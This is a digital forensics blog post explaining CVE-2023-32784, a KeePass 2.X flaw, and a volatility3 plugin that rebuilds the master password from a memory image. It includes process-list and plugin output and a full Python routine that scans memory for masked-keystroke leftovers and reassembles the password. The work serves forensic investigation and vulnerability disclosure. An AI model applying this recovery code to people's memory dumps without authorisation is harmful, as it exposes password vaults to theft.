
📦 Volatility3 Windows Plugin - KeePass

· 5 min read
k1nd0ne
Digital Forensics Spiderman

On May 1st, 2023, vdohney [1] raised concerns about a flaw he found impacting KeePass 2.X [2]. vdohney claimed to be able to reconstruct the master password from memory. A POC [3] was later released by the researcher, not only in dotnet but also in python3 [4].

In this blog post we describe the vulnerability and see how we can create a volatility3 plugin to help forensic investigators retrieve passwords from memory.

Vulnerability description

The vulnerability (CVE-2023-32784 [5]) resides in the basic KeePass version 2.X written in .NET. This version uses its own custom text box named SecureTextBoxEx, not only for the master password entry dialog but also in other parts of the program such as password edit boxes. It should be noted that the flaw does not cover the scenario where the master password was pasted from the clipboard, though that is a bad practice and unlikely to be used. From this observation, vdohney built a method to recover the scattered information from memory. Indeed, this text box leaves over strings when a password is typed: for each keystroke, a string made of mask characters followed by the newly typed character remains in memory. For example, when “Hello” is typed, the following strings remain present in memory: “•e, ••l, •••l, ••••o”. One can find more details about this vulnerability on vdohney’s github [3].

The KeePass volatility3 plugin

As a forensic investigator, you might have actual (or past) cases where KeePass 2.X process activity was retrieved. Using volatility3, it is possible to list the running processes with the “pslist” or “psscan” plugin.

~/work/DFIR/Memory Analysis/MemoryImages/KeePassMachine » vol -f KeePassMachine.mem windows.pslist
Volatility 3 Framework 2.4.1
Progress: 100.00 PDB scanning finished
PID PPID ImageFileName Offset(V) Threads Handles SessionId Wow64 CreateTime ExitTime File output

4 0 System 0x9908d5a87040 136 - N/A False 2023-05-19 14:20:08.000000 N/A Disabled
108 4 Registry 0x9908d5af6080 4 - N/A False 2023-05-19 14:20:04.000000 N/A Disabled
412 4 smss.exe 0x9908dabd8040 2 - N/A False 2023-05-19 14:20:08.000000 N/A Disabled
532 516 csrss.exe 0x9908dac800c0 11 - 0 False 2023-05-19 14:20:32.000000 N/A Disabled
628 516 wininit.exe 0x9908db831080 3 - 0 False 2023-05-19 14:20:32.000000 N/A Disabled
648 620 csrss.exe 0x9908db847140 13 - 1 False 2023-05-19 14:20:32.000000 N/A Disabled
700 628 services.exe 0x9908db894080 7 - 0 False 2023-05-19 14:20:32.000000 N/A Disabled
740 620 winlogon.exe 0x9908db8a4080 3 - 1 False 2023-05-19 14:20:32.000000 N/A Disabled
796 628 lsass.exe 0x9908db8c8080 6 - 0 False 2023-05-19 14:20:32.000000 N/A Disabled
912 700 svchost.exe 0x9908db936240 13 - 0 False 2023-05-19 14:20:32.000000 N/A Disabled
1716 912 dllhost.exe 0x9908de764080 5 - 1 False 2023-05-19 14:23:07.000000 N/A Disabled
4888 700 SgrmBroker.exe 0x9908df512080 7 - 0 False 2023-05-19 14:23:08.000000 N/A Disabled
7820 912 WmiPrvSE.exe 0x9908da4f7080 4 - 0 False 2023-05-19 14:23:26.000000 N/A Disabled
4272 4528 FTK Imager.exe 0x9908da509080 12 - 1 False 2023-05-19 14:23:42.000000 N/A Disabled
4100 700 WUDFHost.exe 0x9908de9a3080 5 - 0 False 2023-05-19 14:23:43.000000 N/A Disabled
2868 912 ShellExperienc 0x9908dec2c080 9 - 1 False 2023-05-19 14:23:45.000000 N/A Disabled
7684 912 RuntimeBroker. 0x9908d7f0d2c0 3 - 1 False 2023-05-19 14:23:46.000000 N/A Disabled
752 4528 KeePass.exe 0x9908da51b300 4 - 1 False 2023-05-19 14:25:34.000000 N/A Disabled
6344 700 svchost.exe 0x9908dd88a080 5 - 0 False 2023-05-19 14:25:49.000000 N/A Disabled

In this example we can see that the KeePass process was running on the host machine. The PID retrieved is “752”. Using volatility3, one can dump this process layer and retrieve all the sections linked to the virtual address spaces. Once completed, one can map virtual pages to physical pages and extract the residing data.

A custom plugin parses the dumped data to isolate the relevant pattern (in this case “●”, the mask character followed by one typed character) and then attempts to reconstruct the KeePass master password entered by the user. The plugin can be found here: https://github.com/forensicxlab/volatility3_plugins/blob/main/keepass.py

By passing the PID of the process to the volatility3 KeePass plugin, one can try to reconstruct the master password:

~/work/DFIR/Memory Analysis/MemoryImages/KeePassMachine » vol -f KeePassMachine.mem windows.keepass --pid 752
Volatility 3 Framework 2.4.1
Progress: 100.00 PDB scanning finished
Offset Size Constructed_Password

0x3ba6000 0x1000 u
0x3ba7000 0x1000 up
0x3ba7000 0x1000 upe
0x3ba8000 0x1000 uper
0x3ba9000 0x1000 uperM
0x3ba9000 0x1000 uperMa
0x3baa000 0x1000 uperMa
0x3baa000 0x1000 uperMas
0x3bab000 0x1000 uperMast
0x3bab000 0x1000 uperMaste
0x3bac000 0x1000 uperMaste
0x3bac000 0x1000 uperMaster
0x3bad000 0x7000 uperMasterP
0x3bad000 0x7000 uperMasterPa
0x3bad000 0x7000 uperMasterPas
0x3bad000 0x7000 uperMasterPass
0x3bad000 0x7000 uperMasterPassw
0x3bad000 0x7000 uperMasterPasswo
0x3bad000 0x7000 uperMasterPasswor
0x3bad000 0x7000 uperMasterPassword
0x7ffbf8ac5000 0x1000 uperMasterPassword
0x96e545bd2000 0x1000 {u,,}perMasterPassword
0xc58000400000 0x200000 {u,&,o}perMasterPassword
0xf80564600000 0x1200000 {u,&,,,J}perMasterPassword
0xf805737d3000 0x1f000 {u,&,,,o, }perMasterPassword

Even though the first character of the password is not stored in memory (the first keystroke leaves no mask-prefixed string), it can easily be brute forced.
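The scanning and reconstruction logic described above, as an added Python example that is neither the plugin's code nor vdohney's POC. It assumes the mask character is U+25CF (“●”) stored as UTF-16LE, since .NET strings are UTF-16 in memory, and runs over a constructed byte buffer standing in for the dumped process memory. Ambiguous positions are rendered in the same {a,b} notation as the plugin output above, and index 0, which is never left in memory, is shown as "?".

```python
import re
from collections import defaultdict

# Mask character drawn by KeePass's SecureTextBoxEx. .NET strings are UTF-16LE in
# memory, so each "●" (U+25CF) is the byte pair cf 25 (assumption for this example,
# not taken from the plugin source).
MASK = "\u25cf"
MASK_BYTES = MASK.encode("utf-16-le")  # b"\xcf\x25"

# n masks followed by exactly one UTF-16LE code unit: the leftover of the n-th keystroke.
LEFTOVER_RE = re.compile(b"((?:" + re.escape(MASK_BYTES) + b")+)(..)", re.DOTALL)


def find_leftovers(data: bytes, max_len: int = 64) -> dict[int, set[str]]:
    """Map password index -> set of candidate characters seen at that index."""
    candidates: dict[int, set[str]] = defaultdict(set)
    for m in LEFTOVER_RE.finditer(data):
        index = len(m.group(1)) // len(MASK_BYTES)  # number of masks == index of the char
        if index > max_len:
            continue  # implausibly long run of masks: filler, not a keystroke
        try:
            ch = m.group(2).decode("utf-16-le")
        except UnicodeDecodeError:
            continue  # e.g. a lone surrogate: not a typed character
        if ch.isprintable() and ch != MASK:
            candidates[index].add(ch)
    return dict(candidates)


def reconstruct(candidates: dict[int, set[str]]) -> str:
    """Render the password like the plugin output: '?' for the unrecoverable first
    character, the character itself when unambiguous, {a,b} when several were found,
    '?' again for an index whose leftover was overwritten or paged out."""
    if not candidates:
        return ""
    out = ["?"]
    for i in range(1, max(candidates) + 1):
        chars = sorted(candidates.get(i, set()))
        if len(chars) == 1:
            out.append(chars[0])
        elif chars:
            out.append("{" + ",".join(chars) + "}")
        else:
            out.append("?")
    return "".join(out)


def leftover(index: int, ch: str) -> bytes:
    """UTF-16LE string of `index` masks followed by `ch`, as the text box leaves it."""
    return (MASK * index + ch).encode("utf-16-le")


# Constructed sample memory: the leftovers of the post's "Hello" example, separated by
# filler bytes, plus one stray "●●●k" to show how an ambiguous index is reported.
FILLER = b"\x00" * 16 + b"KeePass.exe\x00" + bytes(range(0x20, 0x60))
SAMPLE_MEMORY = (
    FILLER + leftover(1, "e") + FILLER + leftover(2, "l") + FILLER
    + leftover(3, "l") + FILLER + leftover(3, "k") + FILLER + leftover(4, "o") + FILLER
)


if __name__ == "__main__":
    found = find_leftovers(SAMPLE_MEMORY)
    for index in sorted(found):
        print(index, sorted(found[index]))
    print("Constructed_Password:", reconstruct(found))  # ?el{k,l}o
```

On a real dump the same scan is run over each readable region of the process layer, which is why the plugin output repeats the growing candidate per page offset: each offset simply contributed the leftovers that happened to survive there.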

Conclusion

To conclude this article, we demonstrated that the reconstruction of a KeePass master password can be implemented in the volatility3 framework via a custom plugin. The discovery of new memory extraction techniques is helping the field of digital forensics, and especially law enforcement agencies, which are now able to access memory from devices in a more efficient and non-destructive way. This methodology could be valuable in solving actual incident cases, including past ones where the memory was retrieved and stored and the KeePass master password remained unbroken.

This plugin was tested on a Win10 22H2 memory image. Do not hesitate to reach me at felix.guyard@forensicxlab.com to enhance this article.

Footnotes

  1. https://sourceforge.net/u/v2023/profile/

  2. https://sourceforge.net/p/keepass/discussion/329220/thread/f3438e6283/

  3. https://github.com/vdohney/keepass-password-dumper

  4. https://github.com/CMEPW/keepass-dump-masterkey

  5. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32784